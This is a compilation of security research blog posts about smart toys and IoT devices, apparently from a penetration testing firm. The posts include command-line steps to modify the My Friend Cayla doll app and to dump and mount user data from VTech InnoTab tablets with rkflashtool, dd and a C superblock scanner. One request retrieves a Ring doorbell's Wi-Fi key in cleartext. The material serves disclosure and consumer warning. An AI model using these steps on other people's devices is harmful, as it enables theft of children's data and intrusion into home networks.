Channel: Android – Pen Test Partners

Some simple security advice for computer and smartphone users



After a recent TV show in which I demonstrated how easy it can be to compromise users’ computers and ‘steal’ very personal video and photos, here’s some really simple advice to help prevent this happening. There are plenty of other resources online that have more information: https://www.getsafeonline.org is a good place to start.

Passwords – if you can honestly say that you never use the same password anywhere, then ignore this advice. If not, then go and download a free password manager tool. They take away nearly all the pain of creating, remembering and managing your passwords for you. Big names in the field include LastPass, KeePass, RoboForm, Dashlane and 1Password, among many others.

Passwords are stolen in data breaches all the time. If you re-use passwords, then a breach at one site puts your accounts on unrelated web sites at risk. If you’ve ever had a weird email from a friend’s Gmail or Yahoo account, that’s likely to be what happened – they re-used a password which was then stolen elsewhere, and their web mail got hacked.

Be cynical – don’t believe ‘Microsoft’ phone calls or phishing mails. If you’re concerned, hang up the phone, then dial the organisation from another phone. Make sure the phone number is legitimate by checking the organisation’s web site.

Phishing – Office documents are a great way to compromise your computer. Never enable macros by clicking ‘enable content’ in an Office document, unless you’re certain the document is legitimate.

This is what the alert looks like:

[Image: the Office ‘enable content’ macro warning]

Don’t click ‘enable content’ unless you are certain the document is safe and legitimate.

Set a decent PIN on your smartphone & tablet, even if you use fingerprint unlock on it. 6 digits is an absolute minimum, ideally 8. In some cases, a 4 digit PIN can be cracked in seconds.

Run good anti-virus software, and pay for a subscription from a brand name that you recognise. The security ‘suite’ you get with a subscription can help prevent you being infected in many other ways. It’s also a good idea to run some anti-malware software from time to time. I quite like Malwarebytes.

Anti-virus is essential on Apple desktops too, particularly if you run Office on your Mac.

Sandboxie – you’re likely to be compromised via one of two routes: email or web browsing. Sandboxie is a free tool that protects your web browser in Windows. It effectively wraps your web browser in another layer of security. If you pick up some malware when web browsing, all you have to do is close your web browser and re-open it, and you get a nice, clean, uninfected web browser. So easy!

Keep everything up to date. Every time your phone or your computer flags an update to you, what the software provider is really saying is ‘we made a mistake, there’s a security flaw in the version of our software that you’ve got. Here’s a fix’.

Unfortunately, updates are usually dressed up as functionality improvements by the vendor – hence consumers often don’t bother to apply them. Skip updates at your peril.


New, easier ways to make My Friend Cayla swear


As you may know we have done a lot of research on My Friend Cayla in a puerile attempt to get her to swear.

We looked at her database of questions and “badwords”, we edited them and eventually got her to swear.

Then ToyQuest updated the app and added SQLCipher encryption to make it harder to access the database, but we managed to bypass that as they had to include the encryption key in plain text in the app!

Tim’s research

A couple of days ago I saw a tweet from a guy called @timmedin who has done some excellent research. His novel work was on iOS. We have applied and verified it on Android.

Our original research uncovered that the swearing filters weren’t applied to ‘talking’ content from the local SQLite database, and that the filter words themselves could be removed. Tim found a route to prevent the filters from being applied to talking content retrieved from Wikipedia.

He showed how you can tamper with the Wikipedia lookups to effectively bypass her badword filter and get her to read “inappropriate” content from Wikipedia. He mentioned how he could have rewritten one of Cayla’s stories on his jailbroken devices to make her say arbitrary things. It got me thinking: we use Cayla a lot in our live hack demos and sometimes struggle to get her to actually speak, let alone swear.

What if we could actually get her to speak a segment of our presentation, complete with expletives?

I started by looking at the name field. Sure, you can set an arbitrary name in the text you want her to say, but the bad word filter still applies and there is a length limit. No luck there, but useful for on-the-fly tricks.


Then I thought: why don’t we try editing her stories and uploading those? The stories come bundled with the app and are pre-prepared so that Cayla will read them out for your child to listen to.


Here’s the how-to

This technique is trivially easy, even for a novice Android attacker.

I downloaded the latest app from the Play store, connected to my rooted tablet with ADB, and pulled the APK from /data/app:

C:\Android\sdk\platform-tools > adb pull /data/app/com.toyquest.Cayla.en_uk-1.apk

With this in hand I set about finding out how the stories are generated. You can open an APK with 7-zip. The stories are stored in \assets\language\en.lproj\story.strings:

[Image: story.strings inside the APK, viewed in 7-zip]
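
As an aside, an APK is just a ZIP archive, so if you prefer the command line to 7-zip, pulling the file out works like this (note the forward slashes for the in-archive path):

 unzip com.toyquest.Cayla.en_uk-1.apk assets/language/en.lproj/story.strings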

Extract the file, open it with Notepad++, and you can edit it to your heart’s content:

[Image: editing story.strings in Notepad++]

This will change the content of the story, but not the actual displayed text within the app!


Once you are happy save the file and add it back to the APK (using 7-zip).

Then you need to upload it back to your device using:

C:\Android\sdk\platform-tools>adb push com.toyquest.Cayla.en_uk-1.apk
/sdcard/com.toyquest.Cayla.en_uk-1.apk

Note: You can’t copy directly to the /data/app folder. You need to copy it to the sdcard folder and then use adb shell as root to copy it to the app folder:

C:\Android\sdk\platform-tools>adb shell
shell@ac79bu:/ $ su
root@ac79bu:/ # cp /sdcard/com.toyquest.Cayla.en_uk-1.apk /data/app/com.toyquest.Cayla.en_uk-1.apk

If you had the app open make sure you restart it.

Then when you go to the story Cayla will read exactly what you have written, including any swear words!

Next steps

Get two dolls to have a conversation, better still get Cayla to turn on a Samsung TV with “Hi TV” and then change the channel to the adult channel…

VTech Innotab Max vulnerable to trivial data extraction


Just when you thought it couldn’t get much worse for VTech toys after the recent breach, we found two easy ways to pull the data from their kids’ InnoTab Max tablet.

In the case of a lost, stolen or re-sold tablet, any and all data that the child or adult has put on there is exposed. Passwords, PINs, email addresses, app data, you name it.

We started by pulling the back off the tablet to see what we could find.

[Image: the RockChip CPU on the InnoTab motherboard]

…and there’s our old friend the RockChip CPU. The model number printing isn’t perfectly legible, but it looks to be an RK3188 unit. Just in case you missed it in our older posts, the issue is as follows:

Most devices need a mode in order to recover from a bricked state, say where an update went wrong. This is fine; one would expect to be able to WRITE new firmware to the device in this state.

However, the RockChip allows data to be READ in this mode too. That’s a huge fail.

So, plug in a USB cable, hold down cursor left, cursor up and the power button for 3 seconds, and you enter flash mode. You’ll need rkflashtool to read memory; here are the parameters you’ll retrieve:

FIRMWARE_VER:4.1.1
MACHINE_MODEL:rk30sdk
MACHINE_ID:007
MANUFACTURER:RK30SDK
MAGIC: 0x5041524B
ATAG: 0x60000800
MACHINE: 3066
CHECK_MASK: 0x80
KERNEL_IMG: 0x60408000
#RECOVER_KEY: 1,1,0,20,0
CMDLINE:board.ap_mdm=0 board.ap_has_earphone=1 board.ap_has_alsa=0 board.ap_multi_card=0
board.ap_data_only=2 console=ttyFIQ0 androidboot.console=ttyFIQ0 init=/init initrd=0x62000000,
0x00800000 mtdparts=rk29xxnand:0x00002000@0x00002000(misc),0x00006000@0x00004000(kernel),
0x00006000@0x0000a000(boot),0x00010000@0x00010000(recovery),0x00020000@0x00020000(backup),
0x00040000@0x00040000(cache),0x00002000@0x00080000(kpanic),0x00004000@0x00082000(app),
0x00300000@0x00086000(system),0x00100000@0x00386000(data),-@0x00486000(userdata)

Lots of lovely data in there – the Android version of 4.1.1, which isn’t great. Also the address at the start of the user data partition (0x00486000).

Simply dump the data partition (it will take an hour or so), mount it, and off you go with someone else’s data.
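
The rkflashtool invocation is along these lines (offsets and lengths are in 512-byte sectors, lifted straight from the mtdparts line above; the exact flags vary a little between rkflashtool versions, so check yours):

 rkflashtool p > parameter.txt              # fetch the parameter block
 rkflashtool r 0x386000 0x100000 > data.img # read the data partition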

This bug has been known about for well over 2 years. It’s a bit lame of VTech to continue shipping vulnerable tablets, tablets that expose children’s data…

But that’s not all!

There’s a microSD card on the motherboard. It was glued on, but that took seconds to prise off.

[Image: the microSD card on the motherboard]

A quick read shows that it’s the filesystem and user data. Yes, really. On a removable SD card. Other than making for another easy route to extract sensitive data, that’s also asking for reliability trouble down the line.

There’s several GB of data on there, we haven’t had time to analyse it yet, but here’s a hexdump to prove the point.

[Image: hexdump of the SD card contents]

And to wrap up, another bug to boot

ADB enabled by default. Looks like we’re root too.

[Image: ADB shell showing root access]

Verdict? VTech could do a LOT better with the security of their hardware that stores our children’s data.

VTech Innotab Max: it’s getting even worse! Apps run in debug mode


After extracting an image from an Innotab last night using the methods we blogged about yesterday, we mounted it and had a look.

Here’s the /data directory mounted on a Linux VM

[Image: the /data directory listing]

Looking at the packages list under system/, things get a whole lot scarier.

The format below is:

package       UID       debugflag       path

[Image: the packages list, with the com.vtech.* debug flags highlighted]

As you can see highlighted, virtually all the com.vtech.* apps have the debugflag enabled.

This means that with an ADB connection you don’t actually need root to read their sandbox or manipulate them.
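
With the debug flag set, a plain (non-root) ADB shell can impersonate a debuggable app with run-as and read its private data directory. A sketch, using an illustrative package name, prompt and output:

 adb shell
 shell@innotab:/ $ run-as com.vtech.example ls
 cache databases files shared_prefs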

We covered the significance of this a while back here:
https://www.pentestpartners.com/blog/android-debug-mode-and-apps-a-cautionary-tale/

What will we find next??

Vtech Innotab Max file extraction: Finding the Superblock


After the VTech hack, we thought we’d have a look at the security of some of their devices, just to see what we could find and whether I would even think about giving one to my kids.

So after further messing around with our online shopping recommendations, we ordered some of their devices. Ken took the back off one, discovered that the CPU was our old friend RockChip and that for some reason it used a micro-SD card to store its data.

I have taken apart a lot of tablets, both hi-spec ones designed for game playing and cheap ones designed for children to use. I have never seen an SD card being used to store the OS. This makes it very easy to extract the contents of the device’s memory and tear it apart offline. You can even do this with five minutes of alone time with the tablet.

I’m going to explain how we can do about doing this.

The first step is the easiest: Image the device. This is best done from Linux through a card reader and can be performed by using the dd command to directly copy from the block device for the card reader to a file.
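
A sketch of that, assuming the card reader shows up as /dev/sdb (check dmesg or lsblk first; dd to the wrong device is unforgiving):

 # image the whole card to a file; the large blocksize just speeds things up
 dd if=/dev/sdb of=innotab.img bs=4M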

We then end up with an 8 GB binary data file. How do we process this? Those of you that have read my previous posts are probably thinking “binwalk”. Usually, yes, but not this time. You can binwalk it, but you will get a lot of false positives and false leads. We’re going to be sneakier.

Now we know that the device is:

  1. Running Android
  2. Based on the RockChip CPU

This gives us an idea of some common partitions (cache, system, data) and how the bootloader works (using a parameter block which defines the partitions when passed to the Linux kernel).

So, as a sanity check and to help us out later, we can use the strings command – which returns anything in the file that looks like a printable string – and search for the parameter block:

 [dave@jotunheim tmp]$ strings innotab.img | less
/PARM
FIRMWARE_VER:4.1.1
MACHINE_MODEL:rk30sdk
MACHINE_ID:007
MANUFACTURER:RK30SDK
MAGIC: 0x5041524B
ATAG: 0x60000800
MACHINE: 3066
CHECK_MASK: 0x80
KERNEL_IMG: 0x60408000
#RECOVER_KEY: 1,1,0,20,0
CMDLINE:board.ap_mdm=0 board.ap_has_earphone=1 board.ap_has_alsa=0 board.ap_multi_card=0 
board.ap_data_only=2 console=ttyFIQ0 androidboot.console=ttyFIQ0 init=/init initrd=0x62000000,
0x00800000 mtdparts=rk29xxnand:0x00002000@0x00002000(misc),0x00006000@0x00004000(kernel),
0x00006000@0x0000a000(boot),0x00010000@0x00010000(recovery),0x00020000@0x00020000(backup),
0x00040000@0x00040000(cache),0x00002000@0x00080000(kpanic),0x00004000@0x00082000(app),
0x00300000@0x00086000(system),0x00100000@0x00386000(data),-@0x00486000(userdata)

Got it! This tells us that there isn’t anything funny going on with the image, that this really is the boot media, and it gives us the locations of the partitions (well, the locations plus an offset that the boot loader knows about):

mtdparts=rk29xxnand:0x00002000@0x00002000(misc),0x00006000@0x00004000(kernel),
0x00006000@0x0000a000(boot),0x00010000@0x00010000(recovery),0x00020000@0x00020000(backup),
0x00040000@0x00040000(cache),0x00002000@0x00080000(kpanic),0x00004000@0x00082000(app),
0x00300000@0x00086000(system),0x00100000@0x00386000(data),-@0x00486000(userdata)

So those numbers are all the offsets, in hexadecimal, at which the partitions are placed. The offsets are in blocks, so we need to multiply each number by 512 (0x200 hex). The format is <length>@<offset>(name).

We can sort this by offset and translate from blocks to bytes:

 name       blocks <length>@<offset>     bytes <length>@<offset>
 misc       0x00002000@0x00002000        0x00400000@0x00400000
 kernel     0x00006000@0x00004000        0x00C00000@0x00800000
 boot       0x00006000@0x0000a000        0x00C00000@0x01400000
 recovery   0x00010000@0x00010000        0x02000000@0x02000000
 backup     0x00020000@0x00020000        0x04000000@0x04000000
 cache      0x00040000@0x00040000        0x08000000@0x08000000
 kpanic     0x00002000@0x00080000        0x00400000@0x10000000
 app        0x00004000@0x00082000        0x00800000@0x10400000
 system     0x00300000@0x00086000        0x60000000@0x10C00000
 data       0x00100000@0x00386000        0x20000000@0x70C00000
 userdata   -@0x00486000                 -@0x90C00000

Unfortunately we still need to know the offset at which all of this starts within the image. We could work this out from the parameter block, but the Internet doesn’t provide much information about these at all. There’s one more thing we can try.

We can try looking for known data and track it back to the start of the partition. Then we can assume the offset is consistent.

As the device is running Android 4.0 or later, we know that at the very least the cache, system and userdata partitions will be using ext2 or later file systems. This gives us an avenue of attack: we can loop through the image and search for things that look like an ext2 file system.

This isn’t immediately easy: we have an 8 GB image and 3 – 4 different files systems in there, so how can we find at least one so that we start finding the other filesystems?

Ext2 (and later) file systems have something called the superblock that is a block at a specified place in the file system that is used to define the parameters for the file system. This superblock is replicated through the file system as a safety measure in case the original one gets corrupted.

We can easily find the format of the superblock thanks to the wonders of open source. From this we know that it is placed 1024 bytes (0x400) from the start of the filesystem, and we know its rough structure.

The superblock has a magic number – a number which should identify the data – of 0xEF53 (you can read that as EFS 3 if you want), but quick experimentation showed that matching the magic number alone would produce a lot of false positives, so I needed slightly more to minimise them.

A bit of delving shows that the structure has some fields, s_state, s_errors and s_creator_os, that are guaranteed to be small. So if we find a block of data with the magic number in the right place and the above fields below certain values, we can be pretty certain we have a superblock. In C, this would be:

 if (superblock.s_magic == 0xef53 &&
          superblock.s_state < 3 &&
          superblock.s_errors < 4 &&
          superblock.s_creator_os < 5) 
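
Wrapped in a loop over the whole image, the idea looks something like the sketch below. This isn’t the actual findsblock tool, just a minimal illustration: it assumes a little-endian host (matching ext2’s on-disk byte order) and tests every 0x400-aligned offset, since that’s the alignment a superblock can sit at.

 #define _FILE_OFFSET_BITS 64
 #include <stdio.h>
 #include <stdint.h>
 #include <sys/types.h>

 /* Just the ext2 superblock fields we check, padded out to their
    on-disk offsets (s_magic lives at byte 56, s_creator_os at 72). */
 struct sb {
     uint8_t  pad[56];
     uint16_t s_magic;
     uint16_t s_state;
     uint16_t s_errors;
     uint16_t s_minor_rev_level;
     uint32_t s_lastcheck;
     uint32_t s_checkinterval;
     uint32_t s_creator_os;
 };

 int main(void)
 {
     FILE *f = fopen("innotab.img", "rb");
     struct sb sb;

     if (!f) { perror("innotab.img"); return 1; }
     for (off_t off = 0; ; off += 0x400) {
         if (fseeko(f, off, SEEK_SET) || fread(&sb, sizeof sb, 1, f) != 1)
             break;
         if (sb.s_magic == 0xef53 && sb.s_state < 3 &&
             sb.s_errors < 4 && sb.s_creator_os < 5)
             printf("Possible superblock at %jx\n", (uintmax_t)off);
     }
     fclose(f);
     return 0;
 }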

So I wrote a quick bit of C, which I’ve uploaded to our github. Note, this is quite hacky and inefficient C and I wouldn’t use it in anger.

Compiling and running this (and waiting for a while) found a number of potential superblocks; most of them were duplicates (remember that bit I said earlier about superblocks being replicated throughout the filesystem as a backup):

 [dave@jotunheim tmp]$ ./findsblock
Possible superblock at 8400400: /cache
Possible superblock at 8414400: /cache
Possible superblock at 841f400: /cache
Possible superblock at 8425400: /cache
Possible superblock at 882e400: /cache
Possible superblock at 8833400: /cache
Possible superblock at 883b400: /cache
Possible superblock at 884a400: /cache
Possible superblock at 11000400: /system
Possible superblock at 19001000: 
Possible superblock at 29001000: 
Possible superblock at 39001000: 
Possible superblock at 411a0400: /system
[...]

And there were more, but we already have enough. Let’s look at the first finding: /cache at 0x8400400. That’s the start of the superblock, which means the file system starts at 0x8400000. Looking at the table above, we can see that according to the parameter block the cache partition should start at 0x08000000, which means that the offset is:

 0x08400000 - 0x08000000 = 0x00400000 

In reality it just means that we can add 0x00400000 to every partition offset to find it in the image. The userdata partition is at 0x90C00000 according to the parameter block, so it must be at:

 0x90C00000 + 0x00400000 = 0x91000000 

…in the image file. So we can extract it. The quickest way to do this is to use the old faithful dd command, using something like:

 dd if=innotab.img of=innotab-userdata.img bs=1 skip=$((0x91000000)) 

But this would take about eight hours, as we’re telling dd to use a blocksize of 1 byte – it would read the file one byte at a time and write it out to the destination one byte at a time.

We can speed this up by increasing the blocksize, using bash arithmetic inside $(( )) brackets. If we pick a blocksize that divides the offset exactly, the skip count stays a whole number and everything lines up. My virtual machine only has 1 GB of memory so I can’t make the blocksize the whole offset, but if I divide it by 4 and then skip 4 blocks it will all magically work out:

 [dave@jotunheim tmp]$ time dd if=innotab.img of=innotab-userdata.img bs=$((0x91000000 / 4)) skip=4
9+1 records in
9+1 records out
5636096000 bytes (5.6 GB) copied, 421.829 s, 13.4 MB/s

real    7m2.643s
user    0m0.004s
sys     0m25.575s

Now we can just mount this volume on a convenient mount point and we can access the userdata partition, which will contain all changeable aspects of the device, including the accounts database, the wireless configuration and the apps’ sandboxes!
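
Mounting is one more command: the loop option lets Linux treat the file as a block device, and ro keeps it read-only while poking around:

 mkdir -p /mnt/userdata
 mount -o loop,ro innotab-userdata.img /mnt/userdata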

 [dave@jotunheim tmp]$ ls /mnt/userdata
app          cameraKeyStatus.txt  gsensorcal          nandCartridgeStatus.txt
app-asec     dalvik-cache         local               property
app-lib      data                 lost+found          resource-cache
app-private  dontpanic            media               ssh
backup       drm                  media_profiles.xml  system
bluetooth    gps                  misc                user 

Why buying a smart toy for a child might be the craziest thing you could do



There are 15 days until Christmas, so there’s still plenty of time to be rummaging around looking for presents and having them delivered. Enough time to actually think about what you’re buying for your nearest and dearest. I’ll still fail at some point though, and end up sending the hollowest of gifts: vouchers.

What I won’t be doing, now or possibly ever, is buying anyone important to me a “smart” toy.

Smart toy consumer advice

The main reason I dislike smart toys is that as a general rule of thumb their security is terrible. While manufacturers speak of the play benefits of tablets and talking dolls, in our experience they have a great deal to learn about how to protect your child’s safety and privacy. You would think that a toy marketed as ‘kid safe’ or ‘safe and secure’ would have security nailed. In most cases, it seems not!

If you’re thinking of giving a smart toy at Christmas, or any other time of year, here’s some advice that may be helpful to you in making the right choices.

Think about the data

A defining feature of smart toys is that they are usually connected to the internet via an app or Wi-Fi. This means that there is information flowing between the toy, smartphone/tablet and the manufacturer. In itself this isn’t a worry, smart toys harvest data in order to function, it’s what makes them “smart”.

What is a worry is how that data is handled. Does it use a secure channel? Is it encrypted? Are the manufacturer’s systems, where your child’s data is stored, robust enough to withstand being hacked? Here’s a three-word answer: VTech database breach.

VTech, the manufacturer of the InnoTab Max kids’ tablet, insufficiently protected its systems, which allowed hackers to access and steal data gathered from tablets via their app. While they said that no credit card or banking information was compromised, they couldn’t say the same for 6.4 million children’s names, genders and dates of birth, as well as postal and email addresses. According to the BBC there is evidence that photographs and chat session logs were also compromised.

Unlike your credit card and banking details, you can’t change your kid’s personal information once that’s in the public domain.

Whilst many manufacturers have provided assurance that they won’t use data collected from children for marketing purposes, that care doesn’t apply to the hacker that has stolen the data! Still, the potential for manufacturers to send carefully worded messages direct to children through their toys must be very tempting.

For example, when My Friend Cayla is asked ‘What is Toys R Us’ she says:
“Toys R Us shops are really big and all they sell is toys and fun things…”

A bit creepy, don’t you think?

Think about the device/toy

In the last year alone we have conducted research on dozens of tablets and many smart dolls and toys. Without exception every single one showed security flaws to some degree. Some were so bad that a hacker could hijack the toy and communicate directly with a child whilst playing. The hacker could snoop on conversations in the house using the toy, or even worse, talk to your child through the toy.

What can you do?

If you want your children to play safely, the internet generally isn’t the ideal playground. However, there are some tips that will minimise the risk:

  • Talking/listening dolls/bears etc. are plain creepy. Given that a hacker may be able to subvert them to communicate directly with your child, you should steer clear. This recent piece of news makes that point perfectly.
  • Don’t buy child-specific tablets. They are cheap for a reason. Security often costs a little extra.
  • If you do want to give a child a tablet as a gift, get a recent model from a known brand and keep the software up to date. Set and use parental control features.

Up to date Android and Apple tablets are pretty secure, particularly if you spend a few minutes setting them up securely. There’s plenty of good advice about that online.

OWASP Birmingham IoT Hackathon


If you came to the OWASP Brum chapter meeting last night, it was great to see you. If you didn’t, here’s what you missed…

Ken (@TheKenMunroShow) opened with some background on the research we’ve done to date and Dave (@tautology0) delivered a primer on hardware hacking and reverse engineering with the dubious help of a Furby, to help get everyone up to speed.

[Photo credit: @sneakymonk3y]

The kit we brought along for breaking… sorry, researching, was:

  • Smarter iKettles 1 and 2
  • Smarter Coffee machines
  • FitBit Aria scales
  • Hoover Wizard smart oven
  • Sphero BB-8
  • Hello Barbie
  • My Friend Freddy Bear
  • My Friend Cayla

Yes, fun was had, and we made more progress with the iKettle 2.0.

***It looks like we may have a method for a super-heated drive-by iKettle attack. Watch this space.***

[Photos: the Aria scales (inside and out), the iKettle, and the event]

Star Wars BB-8 IoT toy: awesome fun, but can it be turned to the Dark Side with this vulnerability?



Like all Star Wars fans, we are all over the merchandise. Hence, when we saw the amazing BB-8 IoT toy from Sphero, we HAD to have one.

It was of course purely for security research, but we had to have a play with it first. We were very impressed. The mobile app is very slick, the toy itself is very cute with some lovely functionality. Very appealing to those who love Star Wars. Watching it go out on ‘patrol’ and explore the office had us all laughing.

There’s a promotional video here
and it pretty much lives up to expectations set in the video.

Yes, it’s expensive at over £100 but I would say worth it.

HOWEVER

I spent a few minutes poking around the Android app that controls the BB-8. It talks to the droid over Bluetooth. There’s no PIN security in the pairing process, but I haven’t got round to investigating whether there’s anything that can be done there.

Various sources have indicated that around 15% or more of all Android apps in the Play store have issues with unprotected communication over the internet. That certainly correlates with our findings when testing Android apps.

So I spent some time rummaging around and MITM’d the wireless connection.

And here’s what I found. If you force a firmware update, it goes over HTTP. No SSL. Fail!

Evidence of this can be found by wiresharking the connection. It points at http://update.orbotix.com/sphero/current/ and constructs a request for the correct firmware.

For example: http://update.orbotix.com/sphero/current/SpheroM4Mix-3.73.bin

This is further revealed in the code in com.orbotix.fimware.e.class, where we can see it constructing the request:

[Image: decompiled code constructing the firmware request URL]

We put this privately to Sphero, who were very responsive & acknowledged the bug. Props to Sphero!

SSL is being implemented currently, though a timeline hasn’t been shared with us.

What could you do with this?

Frankly, not a lot right now. That’s why I’m talking about it in public before an update has been published. There doesn’t appear to be any personal data on the mobile app or the droid. There are no particularly useful sensors on it either, so it’s not like it could be used for spying on the user.

There would have to be a near perfect storm in order to exploit this usefully: if there were a current vulnerability in the Android (or iOS) Bluetooth stack (we’re not aware of one), and the victim had a BB-8, and they did a firmware update whilst an attacker was nearby, then something could be compromised.

What next?

We want to have a look at the firmware to see what’s in there. Binwalk wasn’t immediately forthcoming with useful stuff, so more time needs to be spent there.

Popping rogue firmware on to the BB-8 would be interesting, particularly if we find functionality on there that would be of use. Could we make it do some silly stuff, like head for the hills at high speed? Could we turn it to the DARK SIDE?

Quick analysis of the protocol by my colleague Dave was interesting; it’s a simple binary protocol:

e.g.

ROTATION_RATE = new RobotCommandId("ROTATION_RATE", 3, 3);

So it might be fun to write our own client for it and also fuzz it to see if there’s any undocumented functionality.
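
The framing of that protocol is publicly documented in Sphero’s low-level API guide, so a homebrew client isn’t far off. Here’s a sketch of a packet builder based on that public documentation; set rotation rate sits at DID 0x02, CID 0x03 there, which lines up neatly with the decompiled constant above:

 #include <stdio.h>
 #include <stdint.h>
 #include <stddef.h>

 /* Build a Sphero API command packet, per the published framing:
    FF FF | DID | CID | SEQ | DLEN | data... | CHK
    where DLEN = data length + 1 and CHK is the bitwise complement
    of the modulo-256 sum of everything from DID to the last data byte. */
 static size_t build_packet(uint8_t *out, uint8_t did, uint8_t cid,
                            uint8_t seq, const uint8_t *data, uint8_t len)
 {
     size_t i = 0;
     unsigned sum;

     out[i++] = 0xFF; out[i++] = 0xFF;      /* start of packet */
     out[i++] = did;  out[i++] = cid;  out[i++] = seq;
     out[i++] = (uint8_t)(len + 1);         /* DLEN */
     sum = did + cid + seq + (uint8_t)(len + 1);
     for (uint8_t j = 0; j < len; j++) {
         out[i++] = data[j];
         sum += data[j];
     }
     out[i++] = (uint8_t)~sum;              /* checksum */
     return i;
 }

 int main(void)
 {
     uint8_t pkt[16], rate = 0x40;          /* arbitrary rotation rate */
     size_t n = build_packet(pkt, 0x02, 0x03, 0x00, &rate, 1);

     for (size_t j = 0; j < n; j++)
         printf("%02X ", pkt[j]);
     printf("\n");
     return 0;
 }

Send those bytes over the Bluetooth link and you have the beginnings of both a client and a fuzzer.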

It would also be fairly trivial to change the sound files on the app to make it say stuff to the user. I’ll bet we could make BB-8 swear too.

The Bluetooth implementation also needs looking at. No pairing security isn’t an issue for BB-8 in its current guise, but if new functionality emerges in future…

We also really want to have a look at the new wrist controller or ‘Force Band’ for the BB-8 announced at CES this week. Another cool toy!

Conclusion

WE LOVE BB-8. Great toy Sphero!

But, Sphero could do a little better and implement SSL for their firmware updates. That this simple bug was missed suggests that security assurance could be more thorough. Maybe they accepted the risk, given it isn’t a show-stopping vulnerability.

Though, they did a great job of acknowledging the bug and have a plan to get it fixed. A cool vendor.


Steal your Wi-Fi key from your doorbell? IoT WTF!


The Ring is a Wi-Fi doorbell that connects to your home Wi-Fi. It’s a really cool device that allows you to answer callers from your mobile phone, even when you’re not home.

It’s one of the few IoT devices we’ve looked at that we might even use ourselves. It acts as a CCTV camera, automatically activating if people come close to your home. You can talk to them, to delivery couriers, to visitors etc. It can even hook up to some smart door locks, so you can let guests in to your home.

It is genuinely useful! Unlike most IoT devices :-)


BUT

To set it up, you have to connect it to your home Wi-Fi router. That requires you to give it your Wi-Fi key. Here’s where the problem lies.

First some analysis of the hardware.

The major component is the doorbell itself, which comprises the necessary circuitry, a li-ion battery, a USB charging port for the battery and a setup button. This is connected to a back plate which attaches the doorbell to the wall and can provide power from an AC source.

[Image: inside the Ring doorbell]

Once set up, you fix it to the outside of your house. It’s secured with two Torx T4 screws.


…which means it is extremely vulnerable to theft. Indeed, Ring offer a free replacement if stolen.

The attack, stealing the Wi-Fi key

Take off the door mounting, flip it over and press the orange ‘set up’ button.

[Image: the orange setup button on the back of the doorbell]

Pressing the setup button sets the doorbell’s wireless module (a Gainspan wireless unit) into AP mode. This might sound very familiar if you read our post about the Fitbit Aria scales vulnerability.

An access point is created with this format:

Ring-1ea7a2

…where the last three octets are the end of the MAC address. Simply connect to it.

From here you can connect to the Gainspan unit’s HTTP server and talk directly to the wireless module via a REST-style API.

[Image: the Gainspan wireless module]

If the URL /gainspan/system/config/network is requested from the web server running on the Gainspan unit, the wireless configuration is returned including the configured SSID and PSK in cleartext.

The doorbell is only secured to its back plate by two standard screws. This means that it is possible for an attacker to gain access to the homeowner’s wireless network by unscrewing the Ring, pressing the setup button and accessing the configuration URL.

As it is just a simple URL, this can be done quite easily from a mobile device such as a phone, and without any visible form of tampering with the unit.
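
In fact the whole retrieval boils down to one unauthenticated GET once you’re on the setup network; something like this, where <gainspan-ip> is whatever address the module answers on:

 curl http://<gainspan-ip>/gainspan/system/config/network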

An example:

[Image: the configuration response disclosing the SSID and PSK]

This is quite a fail: walk up to the door, remove the doorbell, retrieve the user’s Wi-Fi key, own their network!

  1. Did Ring ever intend to expose this functionality, or is this just default functionality that Gainspan have in their firmware? As it’s a standard Gainspan URL, it looks like they just hadn’t disabled the configuration.
  2. The Wi-Fi key is still stored in the doorbell somewhere – how well protected is it now? It’s most likely stored in the module; somebody with a soldering iron could possibly get it.
  3. Having physical access to the doorbell means we might be able to upload modified firmware. Your doorbell becomes a back door?

HOWEVER

Kudos is due to Ring for responding to our vulnerability alert within a matter of minutes. A firmware update was released earlier this week that fixes this issue, just two weeks after we disclosed it to them privately. Good job Ring!

Who is tracking your run? Run and bike activity tracking app privacy issues investigated


(Co-written with James Mace.)


Plenty of security vulnerabilities have been found in fitness tracking devices, but we wanted to have a look at the mobile apps that are used for run and bike tracking. Strap your phone to your arm and go out for a run or bike or horse ride. The results were quite shocking.

We found that most of the popular apps we looked at paid scant regard to users’ security. Default settings encouraged users to over-share personal data. One app had a security flaw that allowed private runs to be viewed in real time, so the victim could be tracked.

We looked at this because with these tracking apps we’re not talking about the risk to a device, or to personal information being harvested, or passwords being stolen. We’re talking about genuine risk to personal safety if that information got into the wrong hands.

Real-time stalking anyone?

Briefly, Nike+ was good, Strava was OK, MapMyRun and Runkeeper were below par, and Runtastic had a scary security flaw (now fixed).

What’s at risk?

YOU ARE.

If it’s trivial for anyone to access app data via the website mothership, to target a person and identify exactly where they are (or are going to be) then we have a serious problem on our hands. Of course the availability of that information depends on how a user has configured their app, but as we know many people don’t change default settings. We also know that manufacturers often fail at flagging the importance of changing these settings, and sometimes they don’t provide them at all.

The apps use your phone’s GPS and accelerometers. The information provided is common across all tracking apps. Location, distance, speed, time and elevation are all logged.

Here’s one of us out for a run. During the run, one could watch the runner moving in real time:

[Image: a run being tracked in real time on a map]

In isolation this is fairly harmless information. Athletes have been monitoring this stuff for years, latterly with sports watches. The difference is that back then the information stayed in the watch; it wasn’t sent wirelessly or recorded automatically elsewhere, as it is now.

Apps under scrutiny

Bearing all that in mind we thought a security review of the main apps was long overdue. We looked at some of the most popular iOS, Android, Windows Phone, and BlackBerry apps and compared their features and associated security risks. The chosen apps were:

  • MapMyRun
  • Nike+
  • Runkeeper
  • Runtastic
  • Strava

We limited our investigations to the information sent to and from our phone apps as a regular user. We didn’t reverse engineer the apps or analyse anything server-side.

High level issues

The biggest and most worrying flaw we found was in Runtastic. We discovered that even with its privacy settings enabled and correctly configured it still allowed the tracking of users in real-time. Thankfully that has since been fixed.

MapMyRun, RunKeeper and Runtastic are all guilty of not explicitly encouraging users to protect their data by configuring privacy settings. Yes, the settings are available, but they are not properly signposted, nor are they enabled by default.

Strava was better – whilst their default settings led to over-sharing, they emailed the user the following day with privacy advice.

The only app to run with default privacy settings enabled was Nike+. This means that if you have MapMyRun, RunKeeper, Runtastic or Strava the onus is on you to set it up. Not an ideal scenario by any means.

Let’s look at the apps…

With each of the five apps we reviewed these eight criteria:

1. Default privacy settings
How is user data protected by the app by default, once downloaded? Is your data and/or activity open to others, or does the vendor make it private as standard?

2. Easily tailored privacy settings?
Is it easy and obvious to change the defaults and make your data more secure, or is it buried in layers of configuration?

3. Is your data transmitted securely (SSL)
Is the data sent between the app and website encrypted?

4. Password strength
